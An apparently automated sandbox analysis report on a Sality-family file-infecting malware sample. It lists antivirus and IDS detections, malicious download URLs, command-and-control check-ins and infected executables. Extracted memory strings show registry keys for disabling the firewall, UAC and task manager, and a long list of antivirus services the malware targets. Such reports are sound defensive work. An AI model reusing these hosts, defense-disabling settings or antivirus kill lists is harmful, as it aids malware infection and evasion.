        Antivirus detection for URL or domain
        Source: http://www.careerdesk.org/images/xs.jpgAvira URL Cloud: Label: malware
        Source: http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?96faab4=1108191980PAvira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?c1df27dd=251215592Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?6dcc621=690791622Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?60b080=25346560Avira URL Cloud: Label: malware
        Source: http://amsamex.com/xs.jpg?c46dd74c=-702204804fAvira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?96faab4=1108191980Avira URL Cloud: Label: malware
        Source: http://apple-pie.in/images/xs.jpg?5e41367=98833255Avira URL Cloud: Label: phishing
        Source: http://arthur.niria.biz/xs.jpg?2bcaf743=1582807576Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?2f6b0f9=149164779Avira URL Cloud: Label: malware
        Source: http://www.careerdesk.org/images/xs.jpg?1651959c=1123336404Avira URL Cloud: Label: malware
        Source: http://apple-pie.in/images/xs.jpg?5f87de0d=2115991604pAvira URL Cloud: Label: phishing
        Source: http://apple-pie.in/images/xs.jpg?c7d4d608=1993464376gAvira URL Cloud: Label: phishing
        Source: http://arthur.niria.biz/xs.jpg?67316d6f=898910285Avira URL Cloud: Label: malware
        Source: http://www.careerdesk.org/images/xs.jpg?3c84448=190368984Avira URL Cloud: Label: malware
        Source: http://www.careerdesk.org/images/xs.jpg?9ad6cfae=1905085726Avira URL Cloud: Label: malware
        Source: http://173.193.19.14/logo.gifAvira URL Cloud: Label: malware
        Source: http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234Avira URL Cloud: Label: malware
        Source: http://apple-pie.in/images/xs.jpg?58f235fe=2037783532Avira URL Cloud: Label: phishing
        Source: http://arthur.niria.biz/xs.jpg?224a908=215742000Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?11c3299b=-1612941709Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?e8fd1062=1978557004Avira URL Cloud: Label: malware
        Source: http://apple-pie.in/images/xs.jpg?63977b=19580529&Avira URL Cloud: Label: phishing
        Source: http://apple-pie.in/images/xs.jpg?70445cbe=-228113746Avira URL Cloud: Label: phishing
        Source: http://www.careerdesk.org/images/xs.jpg?17b6de9=198930248Avira URL Cloud: Label: malware
        Source: http://apple-pie.in/images/xs.jpg?ea3b604f=-1460829892Avira URL Cloud: Label: phishing
        Source: http://arthur.niria.biz/xs.jpg?a62d3528=-1506986712Avira URL Cloud: Label: malware
        Source: http://apple-pie.in/images/xs.jpgs.jpgAvira URL Cloud: Label: phishing
        Source: http://apple-pie.in/images/xs.jpg?3e44093b=-116382484Avira URL Cloud: Label: phishing
        Source: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124QeAvira URL Cloud: Label: malware
        Source: http://www.careerdesk.org/images/xs.jpg?18be425f=-973991176Avira URL Cloud: Label: malware
        Source: http://arthur.niria.biz/xs.jpg?1bf90ddb=938613686Avira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k1.rarioAvira URL Cloud: Label: phishing
        Source: http://arthur.niria.biz/xs.jpg?60b080=25346560=Avira URL Cloud: Label: malware
        Source: http://amsamex.com/xs.jpg?73b8b348=-20599928806Avira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareAvira URL Cloud: Label: phishing
        Source: http://arthur.niria.biz/xs.jpg?4fe5ce70=1066875328Avira URL Cloud: Label: malware
        Source: http://althawry.org/images/xs.jpgAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
        Multi AV Scanner detection for domain / URL
        Source: www.careerdesk.orgVirustotal: Detection: 11%Perma Link
        Source: ddos.dnsnb8.netVirustotal: Detection: 11%Perma Link
        Source: apple-pie.inVirustotal: Detection: 13%Perma Link
        Source: arthur.niria.bizVirustotal: Detection: 10%Perma Link
        Source: ahmediye.netVirustotal: Detection: 9%Perma Link
        Source: althawry.orgVirustotal: Detection: 11%Perma Link
        Source: amsamex.comVirustotal: Detection: 8%Perma Link
        Source: http://www.careerdesk.org/images/xs.jpgVirustotal: Detection: 9%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeReversingLabs: Detection: 100%
        Multi AV Scanner detection for submitted file
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeReversingLabs: Detection: 97%
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeVirustotal: Detection: 89%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeJoe Sandbox ML: detected
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdb source: msedge.exe.6.dr
        Source: Binary string: y.pdb source: SearchApp.exe, 0000001F.00000000.1605415996.000001D62E0C2000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdbOGP source: msedge.exe.6.dr

        Spreading

        barindex
        Yara detected Sality
        Source: Yara matchFile source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.2420000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe PID: 7248, type: MEMORYSTR
        Creates autorun.inf (USB autostart)
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile created: C:\autorun.infJump to behavior
        Infects executable files (exe, dll, sys, html)
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile opened: e:Jump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: c:
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns0MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_90833SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMBhttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRAY.CL
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3839049764.000000000458B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: autorun.inf.6.drBinary or memory string: [AutoRun]
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B020 FindNextFileA,FindClose,FindFirstFileA,FindClose,6_2_0042B020
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0041D290 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA,6_2_0041D290
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00433500 FindFirstFileA,FindClose,6_2_00433500
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004BCF09 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,6_2_004BCF09
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_024257A0 GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,6_2_024257A0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242BADD Sleep,lstrcat,lstrcpy,CharLowerA,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,CharUpperA,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,6_2_0242BADD
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B329E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,9_2_00B329E2
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B32B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,9_2_00B32B8C
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.9:64650 -> 1.1.1.1:53
        Source: TrafficSnort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.9:49706 -> 44.221.84.105:799
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49707 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49710 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49711 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 44.221.84.105:80 -> 192.168.2.9:49711
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49712 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49714 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49715 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49717 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49719 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49720 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49721 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49722 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49723 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49724 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49725 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49726 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49727 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49729 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49730 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49731 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49732 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49733 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49734 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49735 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49736 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49737 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49738 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49739 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49740 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49741 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49742 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49743 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49744 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49745 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49746 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49747 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49748 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49749 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49750 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49751 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49752 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49753 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49754 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49755 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49756 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49757 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49758 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49759 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49760 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49761 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49762 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49764 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49765 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49766 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49767 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49768 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49769 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49770 -> 44.221.84.105:80
